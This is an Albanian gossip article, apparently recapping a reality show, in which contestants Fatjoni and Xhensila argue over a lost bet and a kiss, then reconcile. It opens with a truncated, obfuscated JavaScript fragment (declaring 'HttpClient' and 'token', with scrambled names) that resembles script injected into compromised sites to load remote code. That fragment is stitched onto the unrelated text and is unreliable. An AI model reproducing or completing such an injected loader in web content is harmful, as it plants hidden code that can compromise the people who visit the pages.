;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

KUSH TENTOI TA PUTHË XHENSILËN?!

By

Banorët e fundit që i thonë natën e mirë njëri-tjetrit janë Fatjoni dhe Xhensila. Këtë natë ishte një urim i gjumit të ëmbël i veçantë për të dy. Fatjoni, pasi u sqarua me Xhensilën, i kërkon se kur do t’ia japë bastin. Xhensila e ka shprehur që nuk është më indiferente ndaj tij.

Ai kërkon që ta kalojnë natën bashkë, por ajo nuk pranon dhe kjo vjen si pasojë e të mospërballuarit dot dëshirën, për të përmbushur bastin e humbur. Fatjoni duket i vendosur se xhelozisë së tij, do t’i japë një fund të lumtur. Ai kërkon që ajo të flejë me të dhe për më tepër i kërkon puthjen e bastit.

Ajo i thotë se ndihet shumë e ofenduar se si gjeneruan gjërat mes tij dhe Kristit. Fatjoni i thotë se çdo gjë ndodhi për faj të saj, pasi ajo nuk i ka ndarë mirë marrëdhëniet. “Po të isha në të tjera kushte, e dija unë se si sillesha dhe reagoja, por nuk kam ç’të bëj ty” i thotë ai. Xhensila hesht.

Fatjoni kërkon që ajo të përmbushë bastin se e shtuna erdhi, por Xhensila i thotë se dhe mund të dalë ajo këtë javë. Ai i thotë se pa dhënë bastin nuk ka nga shkon.

“Ti je kështu se ke lënë gjëra pezull, je as mish as peshk” i thotë ai.

Xhensila i rrëfen se ajo nuk ka lënë asgjë pezull jashtë shtëpisë dhe është e sigurtë për këtë.

Pas kësaj deklarate ai tenton që ta puthë, por ajo nuk e lejon. Xhensila i thotë se do shkojë të flejë në shtratin e saj dhe i uron natën e mirë. Fatjonit i mbetet të respektojë dëshirën e saj. Xhensila nis të largohet, por kthehet dhe hidhet si një fëmijë në krahët e tij. Ata kalojë pak kohë mes përqafimesh, ledhatimesh dhe puthjesh. Ajo çka Xhensila ka dashur më shumë në këto momente, ishte një përqafim i thellë dhe i gjatë nga i “dashuri i saj në horizont”. Ai i uron natën e mirë dhe i thotë se kjo është nata e fundit që flenë të ndarë.

Artikuj të ngjashëm